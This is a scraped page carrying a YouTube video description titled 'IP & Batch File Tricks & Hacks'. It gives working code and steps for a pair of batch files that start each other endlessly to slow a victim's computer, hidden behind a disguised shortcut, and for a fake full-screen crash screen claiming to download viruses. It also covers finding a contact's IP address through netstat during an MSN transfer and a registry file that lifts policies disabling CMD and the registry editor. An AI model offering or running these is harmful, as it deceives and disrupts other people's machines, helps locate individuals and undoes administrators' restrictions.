blog gratis
Travel Web Dir - Travel Directory » Show YouTube video

Try it Yourself: Episode 12 - IP & Batch File Tricks & Hacks




High Quality Version: http://dillonp23.net/videos/tiy/tiy12.mp4 Hey and welcome to this episode of try it yourself. http://www.myforumz.org http://www.dillonp23.net IP Address Tracers Links: http://www.tracemyip.org http://visualiptrace.visualware.com http://www.ip-adress.com Domain Name Tracer Links: http://whois.domaintools.com http://www.whois.net - Lag Computer with CMD 1. Create a new notepad file and type in the folowing code: [bat1.bat] @echo off start bat2.bat pause [bat2.bat] @echo off start bat1.bat pause 2. Go file: Save As and name it bat1.bat (make sure .bat and NOT .txt) and from the drop down menu choose 'all files'. 3. Right Click: Copy and then paste the file and rename the new file bat2.bat 3. Place those files into a folder and hide somewhere eg. C drive. Then create a shortcut of it somewhere else eg. the desktop and change the icon and name. - Blue Screen of Death Prank 1. Create a new notepad file and type in the folowing code: @echo off cd / cls color 17 echo A problem has been detected and Windows has been shut down to prevent damage echo to your computer. echo. echo The problem seems to be caused by the following file: SPCMDCON.SYS echo. echo PAGE_FAULT_IN_NONPAGED_AREA echo. echo If this is the first time you've seen this stop error screen, echo restart your computer. If this screen appears again, follow echo these steps: echo. echo Check to make sure any new hardware or software is properly installed. echo If this is a new installation, ask your hardware or software manufacturer echo for any Windows updates you might need. echo. echo If problems continue, disable or remove any newly installed hardware echo or software. Disable BIOS memory options such as caching or shadowing. echo If you need to use Safe Mode to remove or disable components, restart echo your computer, press F8 to select Advanced Startup Options, and then echo select Safe Mode. echo. echo Technical information: echo. echo *** STOP: 0x00000050 (0xFD3094C2,0x00000001,0xFBFE7617,0x00000000) echo. echo. echo *** SPCMDCON.SYS - Address FBFE7617 base at FBFE5000, DateStamp 3d6dd67c pause :nul cls echo Downloading viruses . . . ping localhost -n 5 :nul dir /s pause :nul NOTE! Replace :nul with the arrow on the full stop button on the keyboard (youtube won't allow me to add that symbol in the description.) 2. Go file: save as and save it hidden somewhere eg. C:/ naming it WHATEVER.bat and choose 'all files'. 3. Create a shortcut of it on the desktop and go to properties and change the icon and file name. Also in one of the tabs find 'full screen' so it will open full screened. 4. Take a screenshot using ctrl+printscreen and paste into paint and save as an image file. Use that as a screensaver or delete all icons on the desktop and set it as the wallpaper. - Track IP Address of someone over MSN. 1. Send a file to someone on msn or receive a file from them. 2. Go to start menu:File:Run and type CMD and in command prompt type netstat. 3. Find in the code something with 'messenger, hotmail or live' in it. 4. A few lines down or below it should be an IP address, copy that into http://www.ip-adress.com - Reset IP Address in CMD 1. Open command prompt 2. Type in ipconfig /release and then hit enter 3. Type in ipconfig /renew and then hit enter - Enable CMD and registry editor: 1. Type the following code into notepad: REGEDIT4 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp] "Disabled"=dword:0 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem] "DisableRegistryTools"=dword:0 Delete Desktop Icons: 2. Save it as unlock.reg and open it to enable cmd and reg editor. - Email IP Address Tracing 1. Visit http://www.ip-adress.com/trace_email/ 2. Go to the email client you use and view the email source. 3. Copy the source and paste it into the box from the website. Computer Pranks can be found here: http://www.computerpranks.com/downloadable-pranks/default.cfm?SubCategory1ID=22 And a .bat to .exe converter can be found here: http://www.download.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html Thanks for watching, if you have any cell phone hacks you know for my next episode PLEASE email me them, i will mention you in the video. please rate and comments, Thanks for watching! Please don't use this for any illegal or inappropriate ways. Thank You

Related Videos